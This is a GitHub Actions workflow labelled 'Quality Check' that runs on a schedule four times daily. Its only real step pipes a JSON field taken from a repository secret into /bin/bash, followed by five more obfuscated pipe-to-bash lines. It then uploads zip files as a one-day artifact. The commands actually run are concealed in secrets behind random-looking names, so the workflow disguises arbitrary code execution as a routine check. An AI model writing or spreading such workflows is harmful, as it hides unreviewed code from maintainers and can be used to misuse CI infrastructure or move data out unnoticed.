name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '39 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          cz960: ${{ secrets.cz960 }}
        run: |
          printf '%s' "$cz960" | jq -r .met95062 | /bin/bash
          echo $jjfkp2 | jq -r .fz9031 | /bin/bash
          printf '%s' "$s8485" | jq -r .nfaes8 | /bin/bash
          printf '%s' "$kjrd39511" | jq -r .qkjg12 | /bin/bash
          printf '%s' "$elmze76999" | jq -r .ll2526 | /bin/bash
          printf '%s' "$glg07738" | jq -r .vnvda6 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: oyxuC0at
          path: "*.zip"
          retention-days: 1
